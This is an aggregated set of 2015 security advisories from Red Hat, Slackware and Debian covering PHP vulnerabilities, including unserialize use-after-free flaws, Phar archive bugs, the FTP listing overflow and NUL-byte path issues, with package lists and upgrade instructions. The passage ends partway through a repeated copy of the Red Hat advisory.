An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2014-9652, CVE-2015-4604, CVE-2015-4605)
A heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)
A buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)
This update also fixes the following bugs:
-
The libgmp library in some cases terminated unexpectedly with a segmentation fault when being used with other libraries that use the GMP memory management. With this update, PHP no longer changes libgmp memory allocators, which prevents the described crash from occurring. (BZ#1212305)
-
When using the Open Database Connectivity (ODBC) API, the PHP process in some cases terminated unexpectedly with a segmentation fault. The underlying code has been adjusted to prevent this crash. (BZ#1212299)
-
Previously, running PHP on a big-endian system sometimes led to memory corruption in the fileinfo module. This update adjusts the behavior of the PHP pointer so that it can be freed without causing memory corruption. (BZ#1212298)
All php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize() 1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142) 1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c 1188599 - CVE-2014-9652 file: out of bounds read in mconvert() 1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c 1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone 1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict() 1194747 - CVE-2015-2301 php: use after free in phar_object.c 1204868 - CVE-2015-4147 php: SoapClient's __call() type confusion through unserialize() 1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re 1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name 1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1226916 - CVE-2015-4148 php: SoapClient's do_soap_call() type confusion after unserialize() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
ppc64: php-5.4.16-36.el7_1.ppc64.rpm php-cli-5.4.16-36.el7_1.ppc64.rpm php-common-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-gd-5.4.16-36.el7_1.ppc64.rpm php-ldap-5.4.16-36.el7_1.ppc64.rpm php-mysql-5.4.16-36.el7_1.ppc64.rpm php-odbc-5.4.16-36.el7_1.ppc64.rpm php-pdo-5.4.16-36.el7_1.ppc64.rpm php-pgsql-5.4.16-36.el7_1.ppc64.rpm php-process-5.4.16-36.el7_1.ppc64.rpm php-recode-5.4.16-36.el7_1.ppc64.rpm php-soap-5.4.16-36.el7_1.ppc64.rpm php-xml-5.4.16-36.el7_1.ppc64.rpm php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm
s390x: php-5.4.16-36.el7_1.s390x.rpm php-cli-5.4.16-36.el7_1.s390x.rpm php-common-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-gd-5.4.16-36.el7_1.s390x.rpm php-ldap-5.4.16-36.el7_1.s390x.rpm php-mysql-5.4.16-36.el7_1.s390x.rpm php-odbc-5.4.16-36.el7_1.s390x.rpm php-pdo-5.4.16-36.el7_1.s390x.rpm php-pgsql-5.4.16-36.el7_1.s390x.rpm php-process-5.4.16-36.el7_1.s390x.rpm php-recode-5.4.16-36.el7_1.s390x.rpm php-soap-5.4.16-36.el7_1.s390x.rpm php-xml-5.4.16-36.el7_1.s390x.rpm php-xmlrpc-5.4.16-36.el7_1.s390x.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.ael7b_1.src.rpm
ppc64le: php-5.4.16-36.ael7b_1.ppc64le.rpm php-cli-5.4.16-36.ael7b_1.ppc64le.rpm php-common-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-gd-5.4.16-36.ael7b_1.ppc64le.rpm php-ldap-5.4.16-36.ael7b_1.ppc64le.rpm php-mysql-5.4.16-36.ael7b_1.ppc64le.rpm php-odbc-5.4.16-36.ael7b_1.ppc64le.rpm php-pdo-5.4.16-36.ael7b_1.ppc64le.rpm php-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm php-process-5.4.16-36.ael7b_1.ppc64le.rpm php-recode-5.4.16-36.ael7b_1.ppc64le.rpm php-soap-5.4.16-36.ael7b_1.ppc64le.rpm php-xml-5.4.16-36.ael7b_1.ppc64le.rpm php-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: php-bcmath-5.4.16-36.el7_1.ppc64.rpm php-dba-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-devel-5.4.16-36.el7_1.ppc64.rpm php-embedded-5.4.16-36.el7_1.ppc64.rpm php-enchant-5.4.16-36.el7_1.ppc64.rpm php-fpm-5.4.16-36.el7_1.ppc64.rpm php-intl-5.4.16-36.el7_1.ppc64.rpm php-mbstring-5.4.16-36.el7_1.ppc64.rpm php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm php-pspell-5.4.16-36.el7_1.ppc64.rpm php-snmp-5.4.16-36.el7_1.ppc64.rpm
s390x: php-bcmath-5.4.16-36.el7_1.s390x.rpm php-dba-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-devel-5.4.16-36.el7_1.s390x.rpm php-embedded-5.4.16-36.el7_1.s390x.rpm php-enchant-5.4.16-36.el7_1.s390x.rpm php-fpm-5.4.16-36.el7_1.s390x.rpm php-intl-5.4.16-36.el7_1.s390x.rpm php-mbstring-5.4.16-36.el7_1.s390x.rpm php-mysqlnd-5.4.16-36.el7_1.s390x.rpm php-pspell-5.4.16-36.el7_1.s390x.rpm php-snmp-5.4.16-36.el7_1.s390x.rpm
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: php-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm php-dba-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-devel-5.4.16-36.ael7b_1.ppc64le.rpm php-embedded-5.4.16-36.ael7b_1.ppc64le.rpm php-enchant-5.4.16-36.ael7b_1.ppc64le.rpm php-fpm-5.4.16-36.ael7b_1.ppc64le.rpm php-intl-5.4.16-36.ael7b_1.ppc64le.rpm php-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm php-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm php-pspell-5.4.16-36.ael7b_1.ppc64le.rpm php-snmp-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8142 https://access.redhat.com/security/cve/CVE-2014-9652 https://access.redhat.com/security/cve/CVE-2014-9705 https://access.redhat.com/security/cve/CVE-2014-9709 https://access.redhat.com/security/cve/CVE-2015-0231 https://access.redhat.com/security/cve/CVE-2015-0232 https://access.redhat.com/security/cve/CVE-2015-0273 https://access.redhat.com/security/cve/CVE-2015-2301 https://access.redhat.com/security/cve/CVE-2015-2348 https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-2787 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4147 https://access.redhat.com/security/cve/CVE-2015-4148 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4599 https://access.redhat.com/security/cve/CVE-2015-4600 https://access.redhat.com/security/cve/CVE-2015-4601 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. This update fixes some bugs and security issues. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz
Slackware 14.1 package: 52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz
Slackware -current package: e1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz
Slackware x86_64 -current package: ae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg php-5.4.41-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-4024
Denial of service when processing multipart/form-data requests.
CVE-2015-4022
Integer overflow in the ftp_genlist() function may result in
denial of service or potentially the execution of arbitrary code.
For the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.
We recommend that you upgrade your php5 packages
Show details on source website{
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"data": "The phar_parse_tarfile function in ext/phar/tar.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 does not verify that the first character of a filename is different from the \\0 character, which allows remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The \u0027phar_parse_tarfile\u0027 function in PHP\u0027s ext/phar/tar.c file has a security vulnerability. The vulnerability stems from the fact that the program does not verify whether the first character of the file name is a \u0027 \u0027 character. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. 6) - i386, x86_64\n\n3. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php security and bug fix update\nAdvisory ID: RHSA-2015:1135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html\nIssue date: 2015-06-23\nCVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 \n CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 \n CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 \n CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 \n CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 \n CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 \n CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 \n CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP\u0027s Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application. \n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP\u0027s FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP\u0027s enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash. \n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption. \n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize()\n1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)\n1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c\n1188599 - CVE-2014-9652 file: out of bounds read in mconvert()\n1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c\n1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone\n1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict()\n1194747 - CVE-2015-2301 php: use after free in phar_object.c\n1204868 - CVE-2015-4147 php: SoapClient\u0027s __call() type confusion through unserialize()\n1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re\n1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1226916 - CVE-2015-4148 php: SoapClient\u0027s do_soap_call() type confusion after unserialize()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Enterprise Linux Client Optional (v. 